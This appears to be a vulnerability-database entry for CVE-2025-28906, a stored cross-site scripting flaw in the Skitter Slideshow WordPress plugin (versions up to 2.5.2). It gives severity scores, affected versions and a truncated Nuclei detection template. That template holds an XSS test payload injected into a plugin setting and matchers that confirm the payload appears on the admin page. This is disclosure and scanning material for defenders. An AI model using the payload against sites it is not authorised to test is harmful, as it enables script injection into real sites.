CVE-2025-28906
Published: 2025-03-11
Priority: P4 · Severity: medium · CVSS 3.1 base score: 5.9 · Vector: AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L
Exploit likelihood: EPSS 0.49% (38.6th percentile)
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Thiago S.F. Skitter Slideshow wp-skitter-slideshow allows Stored XSS. This issue affects Skitter Slideshow: from n/a through <= 2.5.2.
Affected (1 range):
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| thiago_s.f | skitter_slideshow | <= 2.5.2 | — |
No detection rules found.
Nuclei template: Skitter Slideshow <= 2.5.2 - Authenticated (Administrator+) Stored Cross-Site Scripting (nuclei · CVSS 5.9)

Template name: CVE-2025-28906 Skitter Slideshow <= 2.5.2 - Authenticated (Administrator+) Stored Cross-Site Scripting

Indexed template fragment (truncated as on the page; the leading request lines are missing):

```yaml
Skitter Slideshow alert(document.domain)&wp_skitter_xml=&wp_skitter_theme=square&wp_skitter_animation=random&wp_skitter_type_navigation=numbers&wp_skitter_width=&wp_skitter_height=&wp_skitter_background=%23000&wp_skitter_crop=true&wp_skitter_velocity=&wp_skitter_interval=&wp_skitter_navigation=true&wp_skitter_numbers_align=left&wp_skitter_label=true&wp_skitter_label_animation=&wp_skitter_width_label=&wp_skitter_easing_default=&wp_skitter_controls_position=&wp_skitter_focus_position=&wp_skitter_with_animations=&wp_skitter_auto_play=true

      - |
        GET /wp-admin/options-general.php?page=wp_skitter_menu HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code_4 == 200"
          - "contains(body_4, 'alert(document.domain)')"
        condition: and

    extractors:
      - type: regex
        name: nonce
        part: body_2
        gro
```
No writeups or analysis indexed.